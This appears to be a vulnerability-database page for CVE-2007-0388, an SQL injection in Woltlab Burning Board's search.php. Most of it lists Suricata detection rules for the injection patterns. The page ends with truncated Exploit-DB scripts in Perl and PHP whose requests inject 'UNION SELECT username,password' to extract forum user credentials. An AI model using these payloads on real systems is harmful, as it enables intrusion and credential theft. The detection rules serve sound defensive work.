CVE-2007-0388
published 2007-01-19CVE-2007-0388: SQL injection vulnerability in search.php in Woltlab Burning Board (wBB) 1.0.2 and earlier, and 2.3.6 and earlier in the 2.x series, allows remote attackers to…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.6th percentile
SQL injection vulnerability in search.php in Woltlab Burning Board (wBB) 1.0.2 and earlier, and 2.3.6 and earlier in the 2.x series, allows remote attackers to execute arbitrary SQL commands via the boardids[1] and other boardids[] parameters.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| woltlab | burning_board | <= 1.0.2 | — |
| woltlab | burning_board | <= 2.3.6 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UNION SELECT
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UNION SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"board["; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005287; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids DELETE
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids DELETE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"boardids["; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005283; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Init
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board UPDATE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"board["; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005291; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UPDATE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"boardids["; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005285; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initi
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board SELECT
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"board["; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005286; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acces
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board DELETE
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board DELETE"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"board["; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005289; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acces
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board ASCII
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board ASCII"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"board["; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005290; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acce
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids INSERT
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids INSERT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"boardids["; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005282; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Init
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UNION SELECT
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids UNION SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"boardids["; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005281; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tac
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board INSERT
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php board INSERT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"board["; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005288; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acces
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids ASCII
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids ASCII"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"boardids["; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005284; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Ini
Suricata
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0388 [HIGH] ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids SELECT
ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Woltlab Burning Board (wBB) SQL Injection Attempt -- search.php boardids SELECT"; flow:established,to_server; http.uri; content:"/search.php?"; nocase; content:"boardids["; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-0388; reference:url,www.milw0rm.com/exploits/3144; classtype:web-application-attack; sid:2005280; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Init
Suricata
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-0698 [MEDIUM] ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod SELECT
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod SELECT"; flow:established,to_server; http.uri; content:"/templates/modif.html?"; nocase; content:"id_mod="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0698; reference:url,www.frsirt.com/english/advisories/2007/0388; classtype:web-application-attack; sid:2005057; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Suricata
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod DELETE
suricata·2010-07-30·CVSS 6.8
CVE-2007-0698 [MEDIUM] ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod DELETE
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod DELETE"; flow:established,to_server; http.uri; content:"/templates/modif.html?"; nocase; content:"id_mod="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0698; reference:url,www.frsirt.com/english/advisories/2007/0388; classtype:web-application-attack; sid:2005060; rev:12; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Suricata
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod ASCII
suricata·2010-07-30·CVSS 6.8
CVE-2007-0698 [MEDIUM] ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod ASCII
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod ASCII"; flow:established,to_server; http.uri; content:"/templates/modif.html?"; nocase; content:"id_mod="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0698; reference:url,www.frsirt.com/english/advisories/2007/0388; classtype:web-application-attack; sid:2005061; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Suricata
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UNION SELECT
suricata·2010-07-30·CVSS 6.8
CVE-2007-0698 [MEDIUM] ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UNION SELECT
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UNION SELECT"; flow:established,to_server; http.uri; content:"/templates/modif.html?"; nocase; content:"id_mod="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0698; reference:url,www.frsirt.com/english/advisories/2007/0388; classtype:web-application-attack; sid:2005058; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_nam
Suricata
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE
suricata·2010-07-30·CVSS 6.8
CVE-2007-0698 [MEDIUM] ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod UPDATE"; flow:established,to_server; http.uri; content:"/templates/modif.html?"; nocase; content:"id_mod="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-0698; reference:url,www.frsirt.com/english/advisories/2007/0388; classtype:web-application-attack; sid:2005062; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acce
Suricata
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod INSERT
suricata·2010-07-30·CVSS 6.8
CVE-2007-0698 [MEDIUM] ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod INSERT
ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS ACGVannu SQL Injection Attempt -- modif.html id_mod INSERT"; flow:established,to_server; http.uri; content:"/templates/modif.html?"; nocase; content:"id_mod="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0698; reference:url,www.frsirt.com/english/advisories/2007/0388; classtype:web-application-attack; sid:2005059; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Acc
Exploit-DB
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)
exploitdb·2007-01-17
CVE-2007-0388 Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)
---
#!/usr/bin/perl
# Woltlab Burning Board 2.X/Lite search.php SQL Injection exploit - burned.pl
# written by trew
#
# should work on every wbb regardless of php settings.
#
# v 1.2 - added 1337 sql filter evasion, version identification,better regex,raw cookie
# v 1.1 - added wbblite support (thx to lama)
#
#
#
# !PRIVATE! - !PRIVATE!
#
# Leaked by some morons from egocrew
#
use strict; # 1337
use warnings; # 31337
use LWP::UserAgent;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;
getopt('uisUpAclC');
our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_l, $opt_C );
my $target = shift;
sub do_request($$);
if ( !$target ) { &HELP_MESSAGE; }
my ( $host, $folder );
if ( $target =~ /(?:http:\/\/)?([
Exploit-DB
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)
exploitdb·2007-01-17
CVE-2007-0388 Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)
---
'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
$path .= "search.php";
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$boardids="boardids%5B%5D=$boardid) UNION SELECT username,password FROM ".$prefix."users WHERE 1 NOT IN (0,0";
$data = "searchstring=$searchstring&searchuser=&name_exactly=1&$boardids&showposts=0&searchdate=0";
$data .= "&beforeafter=after&sortby=lastpost&sortorder=desc&send=send&submit=Suchen";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\
Exploit-DB
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)
exploitdb·2007-01-17
CVE-2007-0388 Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)
Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (3)
---
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Response;
$| = 1;
print "
###################################################
##
## Woltlab Burning Board 2.3.6
## Bug by trew
##
###################################################
\n";
if($#ARGV Exploiting...\n";
my $url = shift;
my $id = shift;
my $sstring = shift;
my $ua = LWP::UserAgent->new;
my $request = new HTTP::Request('POST', 'http://'.$url.'search.php');
$request->content('searchuser=&name_exactly=1&topiconly=0&showposts=0&searchdate=0&beforeafter=after&sortby=lastpost&sortorder=desc&send=send&sid=&submit=Suchen&boardids%5B%5D=1)%20UNION%20SELECT%20username,password%20FROM%20bb1_users%20WHERE%20userid='.$id.'/*&searchstring='.$sstring.'');
$request->content_
No writeups or analysis indexed.
http://osvdb.org/33872https://exchange.xforce.ibmcloud.com/vulnerabilities/31550https://www.exploit-db.com/exploits/3143https://www.exploit-db.com/exploits/3144http://osvdb.org/33872https://exchange.xforce.ibmcloud.com/vulnerabilities/31550https://www.exploit-db.com/exploits/3143https://www.exploit-db.com/exploits/3144
2007-01-19
Published